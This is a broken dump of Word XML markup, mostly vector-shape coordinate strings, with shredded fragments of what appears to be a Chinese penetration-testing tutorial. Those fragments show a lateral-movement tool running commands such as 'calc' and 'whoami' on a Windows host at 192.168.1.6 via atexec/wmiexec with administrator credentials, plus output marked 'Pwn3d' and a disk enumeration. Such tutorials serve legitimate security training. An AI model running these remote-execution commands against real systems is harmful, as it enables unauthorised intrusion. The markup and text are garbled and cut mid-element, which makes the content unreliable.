920,6510,10920,6508,10920,6507,10920,6506,10920,6505,10920,6503,10920,6502,10920,6501,10920,6499,10920,6498,10920,6497,10920,6495,10920,6494,10920,6492,10920,6490,10920,6489,10920,6487,10920,6485,10920,6484,10920,6482,10920,6480,10920,6478,10920,6476,10920,6474,10920,6472,10920,6470,10920,6468,10920,6466,10920,6464,10920,6462,10920,6459,10920,6457,10920,6455,10920,6452,10920,6450,10920,6448,10920,6445,10920,6442,10920,6440,10920,6437,10920,6434,10920,6432,10920,6429,10920,6426,10920,6423,10920,6420,10920,6417,10920,6417,10920,6417,10920,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10919,6417,10918,6417,10918,6417,10918,6417,10918,6417,10918,6417,10917,6417,10917,6417,10917,6417,10917,6417,10916,6417,10916,6417,10915,6417,10915,6417,10915,6417,10914,6417,10914,6417,10913,6417,10912,6417,10912,6417,10911,6417,10911,6417,10910,6417,10909,6417,10908,6417,10907,6417,10907,6417,10906,6417,10905,6417,10904,6417,10903,6417,10902,6417,10901,6417,10899,6417,10898,6417,10897,6417,10896,6417,10894,6417,10893,6417,10891,6417,10890,6417,10888,6417,10887,6417,10885,6417,10883,6417,10882,6417,10880,6417,10878,6417,10876,6417,10874,6417,10872,6417,10870,6417,10868,6417,10865,6417,10863,6417,10861,6417,10858,6417,10856,6417,10853,6417,10850,6417,10848,6417,10845,6417,10842,6417,10839,6417,10836,6417,10833,6417,10830,6417,10827,6417,10823,6417,10820,6417,10816,6417,10813,6417,10809,6417,10805,6417,10802,6417,10798,6417,10794,6417,10790,6417,10786,6417,10781,6417,10777,6417,10773,6417,10768,6417,10764,6417,10759,6417,10754,6417,10749,6417,10744,6417,10739,6417,10734,6417,10729,6417,10723,6417,10718,6417,10712,6417,10707,6417,10701,6417,10695,6417,10689,6417,10683,6417,10677,6417,10671,6417,10664e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:588.600pt;width:467.400pt;height:42.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId39" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:14690;width:130;height:270" coordorigin="4710,14690" coordsize="130,270" path="m4736,14716l4736,14716,4736,14716,4736,14716,4736,14716,4736,14716,4736,14716,4736,14716,4736,14716,4736,14716,4736,14716,4736,14716,4736,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4737,14716,4738,14716,4738,14716,4738,14716,4738,14716,4738,14716,4739,14716,4739,14716,4739,14716,4739,14716,4739,14716,4740,14716,4740,14716,4740,14716,4741,14716,4741,14716,4741,14716,4742,14716,4742,14716,4742,14716,4743,14716,4743,14716,4744,14716,4744,14716,4745,14716,4745,14716,4746,14716,4746,14716,4747,14716,4748,14716,4748,14716,4749,14716,4750,14716,4750,14716,4751,14716,4752,14716,4753,14716,4753,14716,4754,14716,4755,14716,4756,14716,4757,14716,4758,14716,4759,14716,4760,14716,4761,14716,4762,14716,4763,14716,4764,14716,4765,14716,4766,14716,4768,14716,4769,14716,4770,14716,4772,14716,4773,14716,4774,14716,4776,14716,4777,14716,4779,14716,4780,14716,4782,14716,4783,14716,4785,14716,4787,14716,4788,14716,4790,14716,4792,14716,4794,14716,4796,14716,4797,14716,4799,14716,4801,14716,4803,14716,4806,14716,4808,14716,4810,14716,4812,14716,4814,14716,4817,14716,4819,14716,4821,14716,4824,14716,4826,14716,4829,14716,4831,14716,4834,14716,4836,14716,4839,14716,4842,14716,4845,14716,4848,14716,4850,14716,4853,14716,4856,14716,4856,14716,4856,14716,4856,14716,4856,14716,4856,14716,4856,14716,4856,14716,4856,14716,4856,14716,4856,14717,4856,14717,4856,14717,4856,14717,4856,14717,4856,14717,4856,14717,4856,14717,4856,14717,4856,14717,4856,14717,4856,14718,4856,14718,4856,14718,4856,14718,4856,14719,4856,14719,4856,14719,4856,14719,4856,14720,4856,14720,4856,14721,4856,14721,4856,14721,4856,14722,4856,14722,4856,14723,4856,14723,4856,14724,4856,14725,4856,14725,4856,14726,4856,14727,4856,14728,4856,14728,4856,14729,4856,14730,4856,14731,4856,14732,4856,14733,4856,14734,4856,14735,4856,14736,4856,14738,4856,14739,4856,14740,4856,14742,4856,14743,4856,14744,4856,14746,4856,14748,4856,14749,4856,14751,4856,14752,4856,14754,4856,14756,4856,14758,4856,14760,4856,14762,4856,14764,4856,14766,4856,14768,4856,14771,4856,14773,4856,14775,4856,14778,4856,14780,4856,14783,4856,14786,4856,14788,4856,14791,4856,14794,4856,14797,4856,14800,4856,14803,4856,14806,4856,14809,4856,14813,4856,14816,4856,14820,4856,14823,4856,14827,4856,14831,4856,14834,4856,14838,4856,14842,4856,14846,4856,14850,4856,14855,4856,14859,4856,14863,4856,14868,4856,14872,4856,14877,4856,14882,4856,14887,4856,14892,4856,14897,4856,14902,4856,14907,4856,14912,4856,14918,4856,14923,4856,14929,4856,14935,4856,14941,4856,14947,4856,14953,4856,14959,4856,14965,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4856,14972,4855,14972,4855,14972,4855,14972,4855,14972,4855,14972,4855,14972,4855,14972,4854,14972,4854,14972,4854,14972,4854,14972,4853,14972,4853,14972,4853,14972,4853,14972,4852,14972,4852,14972,4852,14972,4851,14972,4851,14972,4850,14972,4850,14972,4850,14972,4849,14972,4849,14972,4848,14972,4848,14972,4847,14972,4846,14972,4846,14972,4845,14972,4845,14972,4844,14972,4843,14972,4843,14972,4842,14972,4841,14972,4840,14972,4839,14972,4839,14972,4838,14972,4837,14972,4836,14972,4835,14972,4834,14972,4833,14972,4832,14972,4831,14972,4830,14972,4829,14972,4828,14972,4826,14972,4825,14972,4824,14972,4823,14972,4821,14972,4820,14972,4819,14972,4817,14972,4816,14972,4814,14972,4813,14972,4811,14972,4810,14972,4808,14972,4806,14972,4805,14972,4803,14972,4801,14972,4799,14972,4797,14972,4795,14972,4793,14972,4791,14972,4789,14972,4787,14972,4785,14972,4783,14972,4781,14972,4779,14972,4776,14972,4774,14972,4772,14972,4769,14972,4767,14972,4764,14972,4762,14972,4759,14972,4756,14972,4754,14972,4751,14972,4748,14972,4745,14972,4742,14972,4739,14972,4736,14972,4736,14972,4736,14972,4736,14972,4736,14972,4736,14972,4736,14972,4736,14972,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14971,4736,14970,4736,14970,4736,14970,4736,14970,4736,14969,4736,14969,4736,14969,4736,14969,4736,14968,4736,14968,4736,14967,4736,14967,4736,14967,4736,14966,4736,14966,4736,14965,4736,14964,4736,14964,4736,14963,4736,14963,4736,14962,4736,14961,4736,14960,4736,14960,4736,14959,4736,14958,4736,14957,4736,14956,4736,14955,4736,14954,4736,14953,4736,14951,4736,14950,4736,14949,4736,14948,4736,14946,4736,14945,4736,14944,4736,14942,4736,14940,4736,14939,4736,14937,4736,14935,4736,14934,4736,14932,4736,14930,4736,14928,4736,14926,4736,14924,4736,14922,4736,14920,4736,14917,4736,14915,4736,14913,4736,14910,4736,14908,4736,14905,4736,14902,4736,14900,4736,14897,4736,14894,4736,14891,4736,14888,4736,14885,4736,14882,4736,14879,4736,14875,4736,14872,4736,14868,4736,14865,4736,14861,4736,14857,4736,14854,4736,14850,4736,14846,4736,14842,4736,14838,4736,14833,4736,14829,4736,14825,4736,14820,4736,14816,4736,14811,4736,14806,4736,14801,4736,14796,4736,14791,4736,14786,4736,14781,4736,14775,4736,14770,4736,14764,4736,14759,4736,14753,4736,14747,4736,14741,4736,14735,4736,14729,4736,14723,4736,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:319.500pt;margin-top:734.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6390,14690" coordsize="130,270">
        <v:shape style="position:absolute;left:6390;top:14690;width:130;height:270" coordorigin="6390,14690" coordsize="130,270" path="m6417,14716l6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6417,14716,6418,14716,6418,14716,6418,14716,6418,14716,6418,14716,6418,14716,6418,14716,6418,14716,6418,14716,6418,14716,6418,14716,6419,14716,6419,14716,6419,14716,6419,14716,6419,14716,6420,14716,6420,14716,6420,14716,6420,14716,6421,14716,6421,14716,6421,14716,6421,14716,6422,14716,6422,14716,6423,14716,6423,14716,6423,14716,6424,14716,6424,14716,6425,14716,6425,14716,6426,14716,6426,14716,6427,14716,6427,14716,6428,14716,6428,14716,6429,14716,6430,14716,6430,14716,6431,14716,6432,14716,6433,14716,6433,14716,6434,14716,6435,14716,6436,14716,6437,14716,6438,14716,6439,14716,6440,14716,6441,14716,6442,14716,6443,14716,6444,14716,6445,14716,6446,14716,6447,14716,6449,14716,6450,14716,6451,14716,6452,14716,6454,14716,6455,14716,6457,14716,6458,14716,6459,14716,6461,14716,6463,14716,6464,14716,6466,14716,6467,14716,6469,14716,6471,14716,6473,14716,6475,14716,6476,14716,6478,14716,6480,14716,6482,14716,6484,14716,6486,14716,6488,14716,6491,14716,6493,14716,6495,14716,6497,14716,6500,14716,6502,14716,6505,14716,6507,14716,6509,14716,6512,14716,6515,14716,6517,14716,6520,14716,6523,14716,6526,14716,6528,14716,6531,14716,6534,14716,6537,14716,6537,14716,6537,14716,6537,14716,6537,14716,6537,14716,6537,14716,6537,14716,6537,14716,6537,14716,6537,14717,6537,14717,6537,14717,6537,14717,6537,14717,6537,14717,6537,14717,6537,14717,6537,14717,6537,14717,6537,14717,6537,14718,6537,14718,6537,14718,6537,14718,6537,14719,6537,14719,6537,14719,6537,14719,6537,14720,6537,14720,6537,14721,6537,14721,6537,14721,6537,14722,6537,14722,6537,14723,6537,14723,6537,14724,6537,14725,6537,14725,6537,14726,6537,14727,6537,14728,6537,14728,6537,14729,6537,14730,6537,14731,6537,14732,6537,14733,6537,14734,6537,14735,6537,14736,6537,14738,6537,14739,6537,14740,6537,14742,6537,14743,6537,14744,6537,14746,6537,14748,6537,14749,6537,14751,6537,14752,6537,14754,6537,14756,6537,14758,6537,14760,6537,14762,6537,14764,6537,14766,6537,14768,6537,14771,6537,14773,6537,14775,6537,14778,6537,14780,6537,14783,6537,14786,6537,14788,6537,14791,6537,14794,6537,14797,6537,14800,6537,14803,6537,14806,6537,14809,6537,14813,6537,14816,6537,14820,6537,14823,6537,14827,6537,14831,6537,14834,6537,14838,6537,14842,6537,14846,6537,14850,6537,14855,6537,14859,6537,14863,6537,14868,6537,14872,6537,14877,6537,14882,6537,14887,6537,14892,6537,14897,6537,14902,6537,14907,6537,14912,6537,14918,6537,14923,6537,14929,6537,14935,6537,14941,6537,14947,6537,14953,6537,14959,6537,14965,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6537,14972,6536,14972,6536,14972,6536,14972,6536,14972,6536,14972,6536,14972,6536,14972,6535,14972,6535,14972,6535,14972,6535,14972,6534,14972,6534,14972,6534,14972,6534,14972,6533,14972,6533,14972,6533,14972,6532,14972,6532,14972,6532,14972,6531,14972,6531,14972,6530,14972,6530,14972,6529,14972,6529,14972,6528,14972,6528,14972,6527,14972,6527,14972,6526,14972,6525,14972,6525,14972,6524,14972,6523,14972,6523,14972,6522,14972,6521,14972,6520,14972,6519,14972,6519,14972,6518,14972,6517,14972,6516,14972,6515,14972,6514,14972,6513,14972,6512,14972,6511,14972,6510,14972,6508,14972,6507,14972,6506,14972,6505,14972,6503,14972,6502,14972,6501,14972,6499,14972,6498,14972,6497,14972,6495,14972,6494,14972,6492,14972,6490,14972,6489,14972,6487,14972,6485,14972,6484,14972,6482,14972,6480,14972,6478,14972,6476,14972,6474,14972,6472,14972,6470,14972,6468,14972,6466,14972,6464,14972,6462,14972,6459,14972,6457,14972,6455,14972,6452,14972,6450,14972,6448,14972,6445,14972,6442,14972,6440,14972,6437,14972,6434,14972,6432,14972,6429,14972,6426,14972,6423,14972,6420,14972,6417,14972,6417,14972,6417,14972,6417,14972,6417,14972,6417,14972,6417,14972,6417,14972,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14971,6417,14970,6417,14970,6417,14970,6417,14970,6417,14969,6417,14969,6417,14969,6417,14969,6417,14968,6417,14968,6417,14967,6417,14967,6417,14967,6417,14966,6417,14966,6417,14965,6417,14964,6417,14964,6417,14963,6417,14963,6417,14962,6417,14961,6417,14960,6417,14960,6417,14959,6417,14958,6417,14957,6417,14956,6417,14955,6417,14954,6417,14953,6417,14951,6417,14950,6417,14949,6417,14948,6417,14946,6417,14945,6417,14944,6417,14942,6417,14940,6417,14939,6417,14937,6417,14935,6417,14934,6417,14932,6417,14930,6417,14928,6417,14926,6417,14924,6417,14922,6417,14920,6417,14917,6417,14915,6417,14913,6417,14910,6417,14908,6417,14905,6417,14902,6417,14900,6417,14897,6417,14894,6417,14891,6417,14888,6417,14885,6417,14882,6417,14879,6417,14875,6417,14872,6417,14868,6417,14865,6417,14861,6417,14857,6417,14854,6417,14850,6417,14846,6417,14842,6417,14838,6417,14833,6417,14829,6417,14825,6417,14820,6417,14816,6417,14811,6417,14806,6417,14801,6417,14796,6417,14791,6417,14786,6417,14781,6417,14775,6417,14770,6417,14764,6417,14759,6417,14753,6417,14747,6417,14741,6417,14735,6417,14729,6417,14723,6417,14716e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:175.500pt;margin-top:748.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3510,14970" coordsize="130,270">
        <v:shape style="position:absolute;left:3510;top:14970;width:130;height:270" coordorigin="3510,14970" coordsize="130,270" path="m3521,14987l3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3521,14987,3522,14987,3522,14987,3522,14987,3522,14987,3522,14987,3522,14987,3522,14987,3523,14987,3523,14987,3523,14987,3523,14987,3523,14987,3524,14987,3524,14987,3524,14987,3524,14987,3525,14987,3525,14987,3525,14987,3526,14987,3526,14987,3526,14987,3527,14987,3527,14987,3528,14987,3528,14987,3529,14987,3529,14987,3530,14987,3530,14987,3531,14987,3531,14987,3532,14987,3533,14987,3533,14987,3534,14987,3535,14987,3535,14987,3536,14987,3537,14987,3538,14987,3539,14987,3539,14987,3540,14987,3541,14987,3542,14987,3543,14987,3544,14987,3545,14987,3546,14987,3547,14987,3548,14987,3550,14987,3551,14987,3552,14987,3553,14987,3555,14987,3556,14987,3557,14987,3559,14987,3560,14987,3562,14987,3563,14987,3565,14987,3566,14987,3568,14987,3569,14987,3571,14987,3573,14987,3574,14987,3576,14987,3578,14987,3580,14987,3582,14987,3584,14987,3586,14987,3588,14987,3590,14987,3592,14987,3594,14987,3596,14987,3599,14987,3601,14987,3603,14987,3606,14987,3608,14987,3611,14987,3613,14987,3616,14987,3618,14987,3621,14987,3624,14987,3626,14987,3629,14987,3632,14987,3635,14987,3638,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14987,3641,14988,3641,14988,3641,14988,3641,14988,3641,14988,3641,14989,3641,14989,3641,14989,3641,14990,3641,14990,3641,14990,3641,14991,3641,14991,3641,14992,3641,14992,3641,14993,3641,14993,3641,14994,3641,14994,3641,14995,3641,14996,3641,14996,3641,14997,3641,14998,3641,14999,3641,14999,3641,15000,3641,15001,3641,15002,3641,15003,3641,15004,3641,15005,3641,15007,3641,15008,3641,15009,3641,15010,3641,15012,3641,15013,3641,15015,3641,15016,3641,15018,3641,15019,3641,15021,3641,15023,3641,15024,3641,15026,3641,15028,3641,15030,3641,15032,3641,15034,3641,15036,3641,15038,3641,15041,3641,15043,3641,15045,3641,15048,3641,15050,3641,15053,3641,15056,3641,15058,3641,15061,3641,15064,3641,15067,3641,15070,3641,15073,3641,15076,3641,15080,3641,15083,3641,15086,3641,15090,3641,15093,3641,15097,3641,15101,3641,15104,3641,15108,3641,15112,3641,15116,3641,15120,3641,15125,3641,15129,3641,15133,3641,15138,3641,15143,3641,15147,3641,15152,3641,15157,3641,15162,3641,15167,3641,15172,3641,15177,3641,15183,3641,15188,3641,15194,3641,15199,3641,15205,3641,15211,3641,15217,3641,15223,3641,15229,3641,15235,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3641,15242,3640,15242,3640,15242,3640,15242,3640,15242,3640,15242,3640,15242,3640,15242,3640,15242,3640,15242,3640,15242,3639,15242,3639,15242,3639,15242,3639,15242,3639,15242,3638,15242,3638,15242,3638,15242,3638,15242,3638,15242,3637,15242,3637,15242,3637,15242,3636,15242,3636,15242,3636,15242,3635,15242,3635,15242,3634,15242,3634,15242,3633,15242,3633,15242,3632,15242,3632,15242,3631,15242,3631,15242,3630,15242,3630,15242,3629,15242,3628,15242,3628,15242,3627,15242,3626,15242,3625,15242,3625,15242,3624,15242,3623,15242,3622,15242,3621,15242,3620,15242,3619,15242,3618,15242,3617,15242,3616,15242,3615,15242,3614,15242,3613,15242,3612,15242,3611,15242,3610,15242,3608,15242,3607,15242,3606,15242,3604,15242,3603,15242,3602,15242,3600,15242,3599,15242,3597,15242,3596,15242,3594,15242,3592,15242,3591,15242,3589,15242,3587,15242,3585,15242,3584,15242,3582,15242,3580,15242,3578,15242,3576,15242,3574,15242,3572,15242,3570,15242,3567,15242,3565,15242,3563,15242,3561,15242,3558,15242,3556,15242,3554,15242,3551,15242,3549,15242,3546,15242,3543,15242,3541,15242,3538,15242,3535,15242,3532,15242,3530,15242,3527,15242,3524,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15242,3521,15241,3521,15241,3521,15241,3521,15241,3521,15241,3521,15241,3521,15241,3521,15241,3521,15241,3521,15240,3521,15240,3521,15240,3521,15240,3521,15240,3521,15239,3521,15239,3521,15239,3521,15238,3521,15238,3521,15238,3521,15237,3521,15237,3521,15236,3521,15236,3521,15235,3521,15235,3521,15234,3521,15233,3521,15233,3521,15232,3521,15231,3521,15230,3521,15230,3521,15229,3521,15228,3521,15227,3521,15226,3521,15225,3521,15224,3521,15223,3521,15222,3521,15220,3521,15219,3521,15218,3521,15216,3521,15215,3521,15214,3521,15212,3521,15211,3521,15209,3521,15207,3521,15206,3521,15204,3521,15202,3521,15200,3521,15198,3521,15196,3521,15194,3521,15192,3521,15190,3521,15187,3521,15185,3521,15183,3521,15180,3521,15178,3521,15175,3521,15173,3521,15170,3521,15167,3521,15164,3521,15161,3521,15158,3521,15155,3521,15152,3521,15149,3521,15145,3521,15142,3521,15139,3521,15135,3521,15131,3521,15128,3521,15124,3521,15120,3521,15116,3521,15112,3521,15108,3521,15104,3521,15099,3521,15095,3521,15090,3521,15086,3521,15081,3521,15076,3521,15071,3521,15066,3521,15061,3521,15056,3521,15051,3521,15046,3521,15040,3521,15035,3521,15029,3521,15023,3521,15017,3521,15011,3521,15005,3521,14999,3521,14993,3521,14987e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:325.500pt;margin-top:748.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6510,14970" coordsize="130,270">
        <v:shape style="position:absolute;left:6510;top:14970;width:130;height:270" coordorigin="6510,14970" coordsize="130,270" path="m6522,14987l6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6522,14987,6523,14987,6523,14987,6523,14987,6523,14987,6523,14987,6523,14987,6523,14987,6523,14987,6523,14987,6523,14987,6523,14987,6524,14987,6524,14987,6524,14987,6524,14987,6524,14987,6524,14987,6525,14987,6525,14987,6525,14987,6525,14987,6526,14987,6526,14987,6526,14987,6527,14987,6527,14987,6527,14987,6528,14987,6528,14987,6528,14987,6529,14987,6529,14987,6530,14987,6530,14987,6531,14987,6531,14987,6532,14987,6532,14987,6533,14987,6534,14987,6534,14987,6535,14987,6535,14987,6536,14987,6537,14987,6538,14987,6538,14987,6539,14987,6540,14987,6541,14987,6542,14987,6543,14987,6544,14987,6545,14987,6546,14987,6547,14987,6548,14987,6549,14987,6550,14987,6551,14987,6552,14987,6554,14987,6555,14987,6556,14987,6557,14987,6559,14987,6560,14987,6562,14987,6563,14987,6565,14987,6566,14987,6568,14987,6569,14987,6571,14987,6573,14987,6574,14987,6576,14987,6578,14987,6580,14987,6581,14987,6583,14987,6585,14987,6587,14987,6589,14987,6591,14987,6594,14987,6596,14987,6598,14987,6600,14987,6602,14987,6605,14987,6607,14987,6610,14987,6612,14987,6615,14987,6617,14987,6620,14987,6622,14987,6625,14987,6628,14987,6631,14987,6633,14987,6636,14987,6639,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14987,6642,14988,6642,14988,6642,14988,6642,14988,6642,14988,6642,14989,6642,14989,6642,14989,6642,14990,6642,14990,6642,14990,6642,14991,6642,14991,6642,14992,6642,14992,6642,14993,6642,14993,6642,14994,6642,14994,6642,14995,6642,14996,6642,14996,6642,14997,6642,14998,6642,14999,6642,14999,6642,15000,6642,15001,6642,15002,6642,15003,6642,15004,6642,15005,6642,15007,6642,15008,6642,15009,6642,15010,6642,15012,6642,15013,6642,15015,6642,15016,6642,15018,6642,15019,6642,15021,6642,15023,6642,15024,6642,15026,6642,15028,6642,15030,6642,15032,6642,15034,6642,15036,6642,15038,6642,15041,6642,15043,6642,15045,6642,15048,6642,15050,6642,15053,6642,15056,6642,15058,6642,15061,6642,15064,6642,15067,6642,15070,6642,15073,6642,15076,6642,15080,6642,15083,6642,15086,6642,15090,6642,15093,6642,15097,6642,15101,6642,15104,6642,15108,6642,15112,6642,15116,6642,15120,6642,15125,6642,15129,6642,15133,6642,15138,6642,15143,6642,15147,6642,15152,6642,15157,6642,15162,6642,15167,6642,15172,6642,15177,6642,15183,6642,15188,6642,15194,6642,15199,6642,15205,6642,15211,6642,15217,6642,15223,6642,15229,6642,15235,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6642,15242,6641,15242,6641,15242,6641,15242,6641,15242,6641,15242,6641,15242,6641,15242,6640,15242,6640,15242,6640,15242,6640,15242,6640,15242,6639,15242,6639,15242,6639,15242,6638,15242,6638,15242,6638,15242,6637,15242,6637,15242,6637,15242,6636,15242,6636,15242,6635,15242,6635,15242,6634,15242,6634,15242,6633,15242,6633,15242,6632,15242,6632,15242,6631,15242,6630,15242,6630,15242,6629,15242,6628,15242,6628,15242,6627,15242,6626,15242,6625,15242,6625,15242,6624,15242,6623,15242,6622,15242,6621,15242,6620,15242,6619,15242,6618,15242,6617,15242,6616,15242,6615,15242,6613,15242,6612,15242,6611,15242,6610,15242,6609,15242,6607,15242,6606,15242,6604,15242,6603,15242,6602,15242,6600,15242,6599,15242,6597,15242,6595,15242,6594,15242,6592,15242,6590,15242,6589,15242,6587,15242,6585,15242,6583,15242,6581,15242,6579,15242,6577,15242,6575,15242,6573,15242,6571,15242,6569,15242,6567,15242,6564,15242,6562,15242,6560,15242,6557,15242,6555,15242,6553,15242,6550,15242,6548,15242,6545,15242,6542,15242,6540,15242,6537,15242,6534,15242,6531,15242,6528,15242,6525,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15242,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15241,6522,15240,6522,15240,6522,15240,6522,15240,6522,15240,6522,15239,6522,15239,6522,15239,6522,15238,6522,15238,6522,15238,6522,15237,6522,15237,6522,15236,6522,15236,6522,15235,6522,15235,6522,15234,6522,15233,6522,15233,6522,15232,6522,15231,6522,15230,6522,15230,6522,15229,6522,15228,6522,15227,6522,15226,6522,15225,6522,15224,6522,15223,6522,15222,6522,15220,6522,15219,6522,15218,6522,15216,6522,15215,6522,15214,6522,15212,6522,15211,6522,15209,6522,15207,6522,15206,6522,15204,6522,15202,6522,15200,6522,15198,6522,15196,6522,15194,6522,15192,6522,15190,6522,15187,6522,15185,6522,15183,6522,15180,6522,15178,6522,15175,6522,15173,6522,15170,6522,15167,6522,15164,6522,15161,6522,15158,6522,15155,6522,15152,6522,15149,6522,15145,6522,15142,6522,15139,6522,15135,6522,15131,6522,15128,6522,15124,6522,15120,6522,15116,6522,15112,6522,15108,6522,15104,6522,15099,6522,15095,6522,15090,6522,15086,6522,15081,6522,15076,6522,15071,6522,15066,6522,15061,6522,15056,6522,15051,6522,15046,6522,15040,6522,15035,6522,15029,6522,15023,6522,15017,6522,15011,6522,15005,6522,14999,6522,14993,6522,1498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目标机：无运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行calc进程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4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'123456'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‐‐exec‐m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ethod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atexec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‐x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'calc'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Web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2008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760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Bv1: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455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BMI9HGC42S\administrator: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Pwn3d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Executed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via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atexec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默认采取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wmiexec执行Command，参数为-x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'123456'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'whoa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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mi'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Web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2008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760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Bv1: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455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BMI9HGC42S\administrator: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Pwn3d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Executed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command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bmi9hgc42s\administrator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枚举目标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机disk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192.168.1.6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'123456'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‐‐disks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Web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2008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760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Bv1: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156.553pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,3131">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:3131" coordorigin="10402,0" coordsize="0,3131" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,3,10402,4,10402,5,10402,6,10402,7,10402,9,10402,10,10402,12,10402,14,10402,17,10402,19,10402,22,10402,25,10402,29,10402,32,10402,36,10402,40,10402,45,10402,50,10402,55,10402,60,10402,66,10402,73,10402,79,10402,86,10402,94,10402,101,10402,110,10402,118,10402,128,10402,137,10402,147,10402,158,10402,169,10402,180,10402,192,10402,205,10402,218,10402,232,10402,246,10402,261,10402,276,10402,292,10402,309,10402,326,10402,344,10402,362,10402,381,10402,401,10402,421,10402,442,10402,464,10402,487,10402,510,10402,534,10402,558,10402,584,10402,610,10402,637,10402,665,10402,693,10402,722,10402,752,10402,783,10402,815,10402,848,10402,881,10402,916,10402,951,10402,987,10402,1024,10402,1062,10402,1101,10402,1141,10402,1181,10402,1223,10402,1266,10402,1309,10402,1354,10402,1400,10402,1446,10402,1494,10402,1543,10402,1593,10402,1643,10402,1695,10402,1748,10402,1802,10402,1858,10402,1914,10402,1971,10402,2030,10402,2090,10402,2150,10402,2212,10402,2276,10402,2340,10402,2406,10402,2473,10402,2541,10402,2610,10402,2680,10402,2752,10402,2825,10402,2900,10402,2975,10402,3052,10402,3131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18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,370">
